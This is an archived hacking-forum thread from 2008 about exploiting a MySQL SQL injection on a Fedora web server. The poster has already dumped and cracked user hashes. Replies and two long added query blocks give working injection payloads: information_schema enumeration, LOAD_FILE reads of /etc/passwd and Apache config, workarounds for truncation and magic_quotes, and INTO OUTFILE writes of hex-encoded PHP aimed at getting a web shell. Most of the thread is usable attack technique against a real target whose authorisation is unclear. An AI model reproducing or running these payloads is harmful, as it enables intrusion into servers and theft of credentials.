View full version : mysql doubt
Americandream
13.06.2008, 12:40
Recently I started a pentest of a web server running Fedora, with SquirrelMail, Apache, PHP and MySQL. I found an SQL injection vulnerability, which I quickly tried to explore. I found that MySQL was version 5.0.27 and was running as root, therefore I was able to use load_file and outfile; I verified too that I have access to information_schema. After I grabbed all the tables, I grabbed some interesting data: usernames and hashes. After this I tried to connect to the web server via the web interface, SSH and MySQL to upload a shell, all without success =(. I tried to outfile a shell to the public var of www but I got an error because I don't have permissions, but I verified that I can outfile to /tmp and load_file with success; this is useless, though, since load_file returns a string and I can't access a shell in the /tmp dir via include vulnerabilities. So I got tired and started thinking of other ways to obtain local access to that machine: I load_file'd httpd.conf to obtain the vhost list, to look for the login pages of forums or blogs and later upload a shell. I got some interesting data, but unfortunately some files don't have permissions, like some pages of vhosts and .htaccess files.
This is part of what I got:
EDIT: all hashes cracked
So, about MySQL, my questions are:
1) I can load_file /etc/passwd and some *.php files, but unfortunately I'm unable to load_file some files like .htaccess and the *.php of some vhosts. Does this happen because of file permissions or because of file_priv?
2) Since I cannot read all the content of a file, does load_file have a size limit when loading files? How can I bypass this?
3) Is it possible to use outfile when magic_quotes is on? Because I tried this on other machines using char and hex encoding and none of this worked; is there any solution for this?
4) To get the tables I use
select null,table_name,null from information_schema.tables; what should I use to get the columns?
5) Is it possible to update the content of a field so that, when the page is displayed later, it executes PHP code?
Help will be appreciated, regards.
To get the tables I use
select null,table_name,null from information_schema.tables; what should I use to get the columns?
Use something like this:
select+1,column_name,3,4,5+from+information_schema.columns+where+table_name=0xtable_name_in_hex+limit+0,1/*
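The column-enumeration fragment above, written out as the full queries behind it, as an added example that is not from this thread or from its posters. It assumes a table named users (0x7573657273 in hex), the 5-column UNION shape of the fragment, and MySQL 5.0 or later for information_schema; it goes one step beyond the answer by also showing the GROUP_CONCAT form, which returns every column name in a single request instead of a LIMIT walk.

```sql
-- Added example, not from the thread. Table name 'users' and the 5-column
-- shape are assumptions for illustration.

-- 1. Tables of the database the application is connected to.
--    Filtering on database() is better than a blanket listing, because
--    information_schema also lists mysql.* and other schemas the account
--    may not be able to read.
SELECT 1, table_name, 3, 4, 5
  FROM information_schema.tables
 WHERE table_schema = database()
 LIMIT 0,1;          -- then LIMIT 1,1 ; LIMIT 2,1 ; ... one row per request

-- 2. Columns of one table. The table name is given as a hex literal
--    (0x7573657273 = 'users'): MySQL treats it as a binary string, the
--    comparison works, and no quote character ever reaches magic_quotes.
SELECT 1, column_name, 3, 4, 5
  FROM information_schema.columns
 WHERE table_name = 0x7573657273
 LIMIT 0,1;

-- 3. The same in one request: GROUP_CONCAT collapses all column names
--    into a single row, so no LIMIT walk is needed. The result is cut at
--    @@group_concat_max_len bytes (1024 by default), so check that value
--    if the list looks short.
SELECT 1, GROUP_CONCAT(column_name), 3, 4, 5
  FROM information_schema.columns
 WHERE table_name = 0x7573657273;

-- 4. Pull the interesting columns. CONCAT with a separator (0x3a = ':')
--    keeps two values inside the one column the vulnerable page displays.
SELECT 1, CONCAT(username, 0x3a, password), 3, 4, 5
  FROM users
 LIMIT 0,1;

-- Injected form of step 2, appended to the vulnerable query with spaces
-- written as '+' for the URL and a comment to swallow the rest of it:
--   ...+union+select+1,column_name,3,4,5+from+information_schema.columns
--      +where+table_name=0x7573657273+limit+0,1/*
```

The LIMIT offset walk (step 2) is what the fragment above does; it costs one request per column. Step 3 is the usual replacement on MySQL 4.1 and later, at the price of the group_concat_max_len cap.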
Americandream
16.06.2008, 11:10
Thanks for the quick answer =)
If possible, clarify the other questions.
1) I can load_file /etc/passwd and some *.php files, but unfortunately I'm unable to load_file some files like .htaccess and the *.php of some vhosts. Does this happen because of file permissions or because of file_priv?
I discovered that I was unable to outfile due to directory permissions; fortunately I obtained a directory with permissions and this solved my problem.
So, if possible, try to give a solution for the other questions.
Thanks.
I can load_file /etc/passwd and some *.php files, but unfortunately I'm unable to load_file some files like .htaccess and the *.php of some vhosts. Does this happen because of file permissions or because of file_priv?
It is definitely related to the file permissions; as a rule, if file_priv is turned on, only file permissions restrict an attacker.
Since I cannot read all the content of a file, does load_file have a size limit when loading files? How can I bypass this?
Yes, load_file has a size limit, which is defined by the max_allowed_packet variable.
More info:
LOAD_FILE (http://dev.mysql.com/doc/refman/4.1/en/string-functions.html#function_load-file)
max_allowed_packet (http://dev.mysql.com/doc/refman/5.1/en/program-variables.html)
Is it possible to use outfile when magic_quotes is on? Because I tried this on other machines using char and hex encoding and none of this worked; is there any solution for this?
Unfortunately, it is not possible; INTO OUTFILE accepts only a value between quotes.
More info:
INTO OUTFILE (http://websec.wordpress.com/2007/11/17/mysql-into-outfile/)
Is it possible to update the content of a field so that, when the page is displayed later, it executes PHP code?
It depends on the particular web application: if it is prone to a PHP include vulnerability such that the web app gets data from the database and executes it, then you can modify some fields and as a result you'll get a web shell. However, that is a very rare situation. It happens much more often that you have an SQL injection where one of the columns is supposed to be opened as a file, and sometimes to be included as a script. The latter is also rare.
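The three points answered above (file_priv versus filesystem permissions, the max_allowed_packet limit on LOAD_FILE, and the quoted-path requirement of INTO OUTFILE), written as the queries one would run or inject to check each of them. This is an added example, not from the thread or its posters; the Apache config path, the file names under /tmp and the LOAD_FILE/OUTFILE payloads are assumptions for illustration. One caveat the thread predates: MySQL 5.0.38 introduced secure_file_priv, which confines LOAD_FILE and INTO OUTFILE to one directory regardless of file_priv; the 5.0.27 server in the question does not have it, but any later server must be checked for it first.

```sql
-- Added example, not from the thread. Paths and payloads are illustrative.

-- 1. Is the FILE privilege granted? Without it LOAD_FILE() returns NULL
--    and INTO OUTFILE fails, whatever the filesystem permissions are.
--    Note that the "root" in the question is a MySQL account; file access
--    is still done with the OS uid mysqld runs as (normally 'mysql').
SELECT user(), current_user(), @@version;
SELECT file_priv FROM mysql.user WHERE CONCAT(user, '@', host) = current_user();
-- mysql.user may itself be unreadable; then just try a world-readable file.
-- NULL here, on a file that exists, means no FILE privilege.
-- The path for LOAD_FILE may be any string expression, so hex works and no
-- quote is needed (0x2f6574632f706173737764 = '/etc/passwd'):
SELECT LENGTH(LOAD_FILE(0x2f6574632f706173737764));

-- 2. With file_priv = Y the remaining limits are the OS permissions seen by
--    the mysqld process and max_allowed_packet. LOAD_FILE() does not
--    truncate: for a file larger than max_allowed_packet it returns NULL,
--    so compare the two before blaming the page.
SELECT @@max_allowed_packet;                               -- bytes; 1048576 is the 5.0 default
SELECT LENGTH(LOAD_FILE('/etc/httpd/conf/httpd.conf'));    -- NULL => unreadable or too large

-- 3. If the file fits in max_allowed_packet but the page shows only part of
--    it, the truncation is in the web application (column width, HTML).
--    Page through the content with SUBSTRING and a moving offset instead:
SELECT SUBSTRING(LOAD_FILE('/etc/httpd/conf/httpd.conf'), 1, 500);
SELECT SUBSTRING(LOAD_FILE('/etc/httpd/conf/httpd.conf'), 501, 500);
-- Content with <, > or NUL bytes survives an HTML page better as hex:
SELECT HEX(SUBSTRING(LOAD_FILE('/etc/httpd/conf/httpd.conf'), 1, 500));

-- 4. INTO OUTFILE: the file NAME must be a quoted string literal; the DATA
--    written can be any expression. So a quote is needed exactly once, for
--    the path, and the content can stay free of quotes.
--    0x3c3f706870206563686f20276f6b273b203f3e = "<?php echo 'ok'; ?>"
SELECT 0x3c3f706870206563686f20276f6b273b203f3e INTO OUTFILE '/tmp/t.php';   -- ok
SELECT CHAR(60,63,112,104,112,32,63,62)          INTO OUTFILE '/tmp/t2.php';  -- ok ("<?php ?>")
-- SELECT 1 INTO OUTFILE 0x2f746d702f742e706870;    -- syntax error: the path is not a literal
-- SELECT 1 INTO OUTFILE CHAR(47,116,109,112);       -- syntax error, same reason
-- INTO OUTFILE also refuses to overwrite: the target must not exist yet, and
-- the directory must be writable by the mysqld OS user, which is the /tmp
-- versus web root difference hit in the first post.
```

Step 3 is the answer to "how can I bypass this" only for application-side truncation; nothing inside MySQL gets past a NULL from step 2 except reading a smaller file or raising max_allowed_packet on the server.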
Americandream
17.06.2008, 21:13
Thanks so much for the answers, so just one more doubt left.
Writing info into files without single quotes (example):
SELECT password FROM tablename WHERE username = CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR(39)) INTO OUTFILE CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR(39))
Note: you must specify a new file, it may not exist! And give the correct pathname!
This will not work?
No, that won't work; as I've already said, INTO OUTFILE requires the quotes. And why do you use CONCAT after WHERE? You should just use the sequence of ASCII codes in the CHAR() function, i.e.:
CHAR(39,97,100,109,105,110,39)
Americandream
18.06.2008, 05:25
Look, I just quoted that text from here: forum.antichat.ru/thread61678-mysql+cheat.html
So it's definitely wrong.
Look, I just quoted that text from here: forum.antichat.ru/thread61678-mysql+cheat.html
The author of that thread wanted to say that the material given in it didn't correspond to the facts. You could have guessed this if you knew Russian =)
Americandream
21.06.2008, 13:48
All problems solved.
Thanks Piflit and [Raz0r].
Is it possible to use outfile when magic_quotes is on? Because I tried this on other machines using char and hex encoding and none of this worked; is there any solution for this?
Sometimes this is possible.
I described it here:
http://forum.antichat.ru/showpost.php?p=663815&postcount=39
This is a script for convenience:
http://forum.antichat.ru/showpost.php?p=685943&postcount=54
Americandream
18.07.2008, 03:51
Scipio, sorry for the delay of my response.
Thanks for providing more information and the script.